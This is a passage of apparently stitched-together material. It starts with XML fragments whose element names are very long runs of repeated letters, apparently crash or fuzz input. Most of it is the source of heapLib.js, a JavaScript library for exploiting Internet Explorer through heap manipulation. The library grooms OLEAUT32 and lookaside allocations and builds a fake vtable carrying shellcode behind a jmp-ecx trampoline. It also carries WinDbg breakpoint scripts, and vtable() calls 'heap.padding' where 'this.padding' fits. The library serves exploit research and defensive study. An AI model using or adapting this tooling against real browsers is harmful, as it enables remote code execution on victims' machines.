<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB />
</Device>
</Devices>
</XML>

<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<XML ID="xmlid6">
<root>
<data>
<CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
        value2
</CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC>
</data>
</root>
</XML>

  </body>
</html>

heapLib.js:

/*
   JavaScript Heap Exploitation library
   by Alexander Sotirov <[email]asotirov@determina.com[/email]>
 
   Version 0.3


   To enable debugging output, set the following WinDbg breakpoints:

bc *
bu 7c9106eb "j (poi(esp+4)==0x150000) '.printf \"alloc(0x%x) = 0x%x\", poi(esp+c), eax; .echo; g'; 'g';"
bu ntdll!RtlFreeHeap "j ((poi(esp+4)==0x150000) & (poi(esp+c)!=0)) '.printf \"                          free(0x%x), size=0x%x\", poi(esp+c), wo(poi(esp+c)-8)*8-8; .echo; g'; 'g';"
bd 0 1
bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == babe) '.printf \"DEBUG: %mu\", poi(poi(poi(esp+14)+8)+8); .echo; g';"
bu jscript!JsAtan "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: Enabling heap breakpoints; be 0 1; g';"
bu jscript!JsAsin "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: Disabling heap breakpoints; bd 0 1; g';"
bu jscript!JsAcos "j (poi(poi(esp+14)+8) == babe) '.echo DEBUG: heapLib breakpoint'"
g

   To disabled the OLEAUT32 cache, set oleaut32!g_fDebNoCache to 1

*/


//
// heapLib namespace
//

function heapLib() {
}


//
// heapLib class
//

// heapLib.ie constructor
//
// Creates a new heapLib API object for Internet Explorer. The maxAlloc
// argument sets the maximum block size that can be allocated using the alloc()
// function.
//
// Arguments:
//    maxAlloc - maximum allocation size in bytes (defaults to 65535)
//    heapBase - base of the default process heap (defaults to 0x150000)
//

heapLib.ie = function(maxAlloc, heapBase) {

    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);

    // Allocate a padding string that uses maxAlloc bytes
    this.paddingStr = "AAAA";

    while (4 + this.paddingStr.length*2 + 2 < this.maxAlloc) {
        this.paddingStr += this.paddingStr;
    }
   
    // Create an array for storing references to allocated memory
    this.mem = new Array();

    // Call flushOleaut32() once to allocate the maximum size blocks
    this.flushOleaut32();
}


//
// Outputs a debugging message in WinDbg. The msg argument must be a string
// literal. Using string concatenation to build the message will result in heap
// allocations.
//
// Arguments:
//    msg - string to output
//

heapLib.ie.prototype.debug = function(msg) {
    void(Math.atan2(0xbabe, msg));
}


//
// Enables or disables logging of heap operations in WinDbg.
//
// Arguments:
//    enable - a boolean value, set to true to enable heap logging
//

heapLib.ie.prototype.debugHeap = function(enable) {

    if (enable == true)
        void(Math.atan(0xbabe));
    else
        void(Math.asin(0xbabe));
}


//
// Triggers a breakpoint in the debugger.
//

heapLib.ie.prototype.debugBreak = function(msg) {
    void(Math.acos(0xbabe));
}


//
// Returns a string of a specified length, up to the maximum allocation size
// set in the heapLib.ie constructor. The string contains "A" characters.
//
// Arguments:
//    len - length in characters
//

heapLib.ie.prototype.padding = function(len) {
    if (len > this.paddingStr.length)
        throw "Requested padding string length " + len + ", only " + this.paddingStr.length + " available";

    return this.paddingStr.substr(0, len);
}


//
// Returns a number rounded up to a specified value.
//
// Arguments:
//    num   - integer to round
//    round - value to round to
//

heapLib.ie.prototype.round = function(num, round) {
    if (round == 0)
        throw "Round argument cannot be 0";

    return parseInt((num + (round-1)) / round) * round;
}


//
// Converts an integer to a hex string. This function uses the heap.
//
// Arguments:
//    num   - integer to convert
//    width - pad the output with zeros to a specified width (optional)
//

heapLib.ie.prototype.hex = function(num, width)
{
    var digits = "0123456789ABCDEF";

    var hex = digits.substr(num & 0xF, 1);

    while (num > 0xF) {
        num = num >>> 4;
        hex = digits.substr(num & 0xF, 1) + hex;
    }

    var width = (width ? width : 0);

    while (hex.length < width)
        hex = "0" + hex;

    return hex;
}


//
// Convert a 32-bit address to a 4-byte string with the same representation in
// memory. This function uses the heap.
//
// Arguments:
//    addr - integer representation of the address
//

heapLib.ie.prototype.addr = function(addr) {
    return unescape("%u" + this.hex(addr & 0xFFFF, 4) + "%u" + this.hex((addr >> 16) & 0xFFFF, 4));
}


//
// Allocates a block of a specified size with the OLEAUT32 alloc function.
//
// Arguments:
//    arg - size of the new block in bytes, or a string to strdup
//    tag - a tag identifying the memory block (optional)
//

heapLib.ie.prototype.allocOleaut32 = function(arg, tag) {

    var size;

    // Calculate the allocation size
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    // Create an array for this tag if doesn't already exist
    if (this.mem[tag] === undefined)
        this.mem[tag] = new Array();

    if (typeof arg == "string" || arg instanceof String) {
        // Allocate a new block with strdup of the string argument
        this.mem[tag].push(arg.substr(0, arg.length));
    }
    else {
        // Allocate the block
        this.mem[tag].push(this.padding((arg-6)/2));
    }
}


//
// Frees all memory blocks marked with a specific tag with the OLEAUT32 memory
// allocator.
//
// Arguments:
//    tag - a tag identifying the group of blocks to be freed
//

heapLib.ie.prototype.freeOleaut32 = function(tag) {

    delete this.mem[tag];
   
    // Run the garbage collector
    CollectGarbage();
}


//
// The JScript interpreter uses the OLEAUT32 memory allocator for all string
// allocations. This allocator stores freed blocks in a cache and reuses them
// for later allocations. The cache consists of 4 bins, each storing up to 6
// blocks. Each bin holds blocks of a certain size range:
//
//    0 - 32
//    33 - 64
//    65 - 256
//    257 - 32768
//
// When a block is freed by the OLEAUT32 free function, it is stored in one of
// the bins. If the bin is full, the smallest block in the bin is freed with
// RtlFreeHeap() and is replaced with the new block. Chunks larger than 32768
// bytes are not cached and are freed directly.
//
// To flush the cache, we need to free 6 blocks of the maximum size for each
// bin. The maximum size blocks will push out all smaller blocks from the
// cache. Then we allocate the maximum size blocks again, leaving the cache
// empty.
//
// You need to call this function once to allocate the maximum size blocks
// before you can use it to flush the cache.
//

heapLib.ie.prototype.flushOleaut32 = function() {

    this.debug("Flushing the OLEAUT32 cache");

    // Free the maximum size blocks and push out all smaller blocks

    this.freeOleaut32("oleaut32");
   
    // Allocate the maximum sized blocks again, emptying the cache

    for (var i = 0; i < 6; i++) {
        this.allocOleaut32(32, "oleaut32");
        this.allocOleaut32(64, "oleaut32");
        this.allocOleaut32(256, "oleaut32");
        this.allocOleaut32(32768, "oleaut32");
    }
}


//
// Allocates a block of a specified size with the system memory allocator. A
// call to this function is equivalent to a call to HeapAlloc(). If the first
// argument is a number, it specifies the size of the new block, which is
// filled with "A" characters. If the argument is a string, its data is copied
// into a new block of size arg.length * 2 + 6. In both cases the size of the
// new block must be a multiple of 16 and not equal to 32, 64, 256 or 32768.
//
// Arguments:
//    arg - size of the memory block in bytes, or a string to strdup
//    tag - a tag identifying the memory block (optional)
//

heapLib.ie.prototype.alloc = function(arg, tag) {

    var size;

    // Calculate the allocation size
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if (size == 32 || size == 64 || size == 256 || size == 32768)
        throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";

    // Allocate the block with the OLEAUT32 allocator
    this.allocOleaut32(arg, tag);
}


//
// Frees all memory blocks marked with a specific tag with the system memory
// allocator. A call to this function is equivalent to a call to HeapFree().
//
// Arguments:
//    tag - a tag identifying the group of blocks to be freed
//

heapLib.ie.prototype.free = function(tag) {

    // Free the blocks with the OLEAUT32 free function
    this.freeOleaut32(tag);

    // Flush the OLEAUT32 cache
    this.flushOleaut32();
}


//
// Runs the garbage collector and flushes the OLEAUT32 cache. Call this
// function before before using alloc() and free().
//

heapLib.ie.prototype.gc = function() {

    this.debug("Running the garbage collector");
    CollectGarbage();

    this.flushOleaut32();
}


//
// Adds blocks of the specified size to the free list and makes sure they are
// not coalesced. The heap must be defragmented before calling this function.
// If the size of the memory blocks is less than 1024, you have to make sure
// that the lookaside is full.
//
// Arguments:
//    arg    - size of the new block in bytes, or a string to strdup
//    count  - how many free blocks to add to the list (defaults to 1)
//

heapLib.ie.prototype.freeList = function(arg, count) {

    var count = (count ? count : 1);

    for (var i = 0; i < count; i++) {
        this.alloc(arg);
        this.alloc(arg, "freeList");
    }
    this.alloc(arg);

    this.free("freeList");
}


//
// Add blocks of the specified size to the lookaside. The lookaside must be
// empty before calling this function.
//
// Arguments:
//    arg    - size of the new block in bytes, or a string to strdup
//    count  - how many blocks to add to the lookaside (defaults to 1)
//

heapLib.ie.prototype.lookaside = function(arg, count) {

    var size;

    // Calculate the allocation size
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");

    var count = (count ? count : 1);

    for (var i = 0; i < count; i++)
        this.alloc(arg, "lookaside");

    this.free("lookaside");
}


//
// Return the address of the head of the lookaside linked list for blocks of a
// specified size. Uses the heapBase parameter from the heapLib.ie constructor.
//
// Arguments:
//    arg - size of the new block in bytes, or a string to strdup
//

heapLib.ie.prototype.lookasideAddr = function(arg)
{
    var size;

    // Calculate the allocation size
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;    // len + string data + null terminator
    else
        size = arg;

    // Make sure that the size is valid
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";

    if (size+8 >= 1024)
        throw("Maximum lookaside block size is 1008 bytes");

    // The lookahead array starts at heapBase + 0x688. It contains a 48 byte
    // structure for each block size + header size in 8 byte increments.

    return this.heapBase + 0x688 + ((size+8)/8)*48;
}


//
// Returns a fake vtable that contains shellcode. The caller should free the
// vtable to the lookaside and use the address of the lookaside head as an
// object pointer. When the vtable is used, the address of the object must be
// in eax and the pointer to the vtable must be in ecx. Any virtual function
// call through the vtable from ecx+8 to ecx+0x80 will result in shellcode
// execution. This function uses the heap.
//
// Arguments:
//    shellcode - shellcode string
//    jmpecx    - address of a jmp ecx or equivalent instruction
//    size      - size of the vtable to generate (defaults to 1008 bytes)
//

heapLib.ie.prototype.vtable = function(shellcode, jmpecx, size) {

    var size = (size ? size : 1008);

    // Make sure the size is valid
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";

    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");

    // Build the fake vtable that will go on the lookaside list
    //
    // lookaside ptr  jmp +124  addr of jmp ecx  sub [eax], al*2  shellcode       null
    // 4 bytes        4 bytes   124 bytes        4 bytes          size-138 bytes  2 bytes

    var vtable = unescape("%u9090%u7ceb")   // nop, nop, jmp + 124

    for (var i = 0; i < 124/4; i++)
        vtable += this.addr(jmpecx);

    // If the vtable is the only entry on the lookaside, the first 4 bytes will
    // be 00 00 00 00, which disassembles as two add [eax], al instructions.
    // The jmp ecx trampoline will jump back to the beginning of the vtable and
    // execute the add [eax], al instructions. We need to use two sub [eax], al
    // instructions to fix the heap.

    vtable += unescape("%u0028%u0028") +    // two sub [eax], al instructions
              shellcode + heap.padding((size-138)/2 - shellcode.length);

    return vtable;
}